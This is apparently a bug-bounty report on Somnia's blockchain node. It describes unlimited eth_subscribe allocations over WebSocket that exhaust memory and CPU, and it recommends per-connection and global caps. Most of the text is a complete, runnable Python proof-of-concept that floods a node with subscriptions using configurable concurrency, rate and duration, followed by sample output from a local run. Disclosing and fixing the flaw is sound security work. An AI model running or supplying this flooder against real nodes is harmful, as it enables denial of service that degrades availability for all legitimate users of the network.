https://github.com/hackenproof-public/somnia
Somnia exposes the eth_subscribe / eth_unsubscribe RPC over WebSocket for real-time events.
APISubscribeRPCHandler::HandleRequest() allocates a fresh subscription ID via APISubscriber::AllocateSubscriptionId().AllocateSubscriptionId() simply return next_subscription_id++ without checking any global or per-connection limit.Add*Subscription() functions never validate the current subscription count.all_subscriptions mapsubscriptions_to_all_blocks)
and referenced on every Tick() iteration.eth_subscribe, easily pushing the maps to millions of entries.By contrast, filter-based polling APIs are protected by max_num_active_filters (see api_parameters.h), showing a missing symmetric control for subscriptions.
AddBlockSubscription():68–91; AddTransactionSubscription():93–135; AddLogSubscription():142–203Tick():330–395all_subscriptions and fan-out indices lines 432–442max_num_active_filters = 1024; lines 75Overall availability of the node degrades, affecting all legitimate users.
Introduce a hard cap (per-connection & global) on active subscriptions, similar to max_num_active_filters (e.g., 1 k per connection, 10 k global). or/and Enforce the limit inside APISubscriber::{Add*Subscription} and refuse with JSON-RPC error "too many active subscriptions".
python3 py/scripts/eth_subscribe_flood_poc.py --ws ws://127.0.0.1:6000 --type newHeads --concurrency 20 --rate 100 --duration 900
#!/usr/bin/env python3
import asyncio
import argparse
import itertools
import json
import os
import signal
import sys
import time
from typing import Optional
try:
import websockets
except ImportError:
print("Missing dependency: websockets. Install with: pip install websockets", file=sys.stderr)
sys.exit(1)
STOP = False
def _handle_sigint(*_):
global STOP
STOP = True
signal.signal(signal.SIGINT, _handle_sigint)
SUB_TYPES = {
"newHeads": ["newHeads"],
"logs": ["logs"],
"pendingTx": ["newPendingTransactions"],
# Extend as needed
}
async def subscribe_once(ws, sub_params, read_response: bool) -> bool:
try:
req_id = subscribe_once.req_counter
subscribe_once.req_counter += 1
payload = {
"id": req_id,
"jsonrpc": "2.0",
"method": "eth_subscribe",
"params": sub_params,
}
await ws.send(json.dumps(payload))
if read_response:
# Read at most one response (subscription id or error)
_ = await asyncio.wait_for(ws.recv(), timeout=5)
return True
except Exception:
return False
subscribe_once.req_counter = 1
async def worker(uri: str, sub_params, rate: float, read_response: bool, stats):
# Optional rate limit: rate subscriptions per second (approx)
next_time = time.perf_counter()
while not STOP:
try:
async with websockets.connect(uri, max_queue=None) as ws:
while not STOP:
ok = await subscribe_once(ws, sub_params, read_response)
if ok:
stats["ok"] += 1
else:
stats["err"] += 1
if rate > 0:
next_time += 1.0 / rate
await asyncio.sleep(max(0, next_time - time.perf_counter()))
except Exception:
stats["conn_err"] += 1
await asyncio.sleep(0.5)
async def main():
p = argparse.ArgumentParser(description="Flood eth_subscribe to stress Somnia RPC WS")
p.add_argument("--ws", required=True, help="WebSocket endpoint, e.g. ws://127.0.0.1:8546")
p.add_argument("--type", default="newHeads", choices=list(SUB_TYPES.keys()), help="Subscription type")
p.add_argument("--concurrency", type=int, default=10, help="Number of concurrent workers (connections)")
p.add_argument("--rate", type=float, default=50.0, help="Subscriptions per second per worker (approx)")
p.add_argument("--duration", type=int, default=0, help="Duration seconds (0 = run until Ctrl+C)")
p.add_argument("--read-response", action="store_true", help="Read a single response for each subscribe")
args = p.parse_args()
sub_params = SUB_TYPES[args.type]
manager = {
"ok": 0,
"err": 0,
"conn_err": 0,
}
tasks = [asyncio.create_task(worker(args.ws, sub_params, args.rate, args.read_response, manager))
for _ in range(args.concurrency)]
start = time.time()
try:
while not STOP:
await asyncio.sleep(1.0)
elapsed = max(1.0, time.time() - start)
total = manager["ok"] + manager["err"]
print(f"elapsed={elapsed:.0f}s ok={manager['ok']} err={manager['err']} conn_err={manager['conn_err']} rps~={total/elapsed:.1f}")
if args.duration and (time.time() - start) >= args.duration:
break
finally:
for t in tasks:
t.cancel()
await asyncio.gather(*tasks, return_exceptions=True)
if __name__ == "__main__":
asyncio.run(main())
Running multiple instances quickly drives the node’s RAM and CPU usage upward until it becomes unresponsive.
Sample run (ws://127.0.0.1:6000, concurrency=20, rate=100):
elapsed=10s ok=19916 err=0 conn_err=0 rps~=1983.5
elapsed=20s ok=40066 err=0 conn_err=0 rps~=1991.1
ws://localhost:6000).all_subscriptions and subscriptions_to_all_* maps to confirm unbounded growth.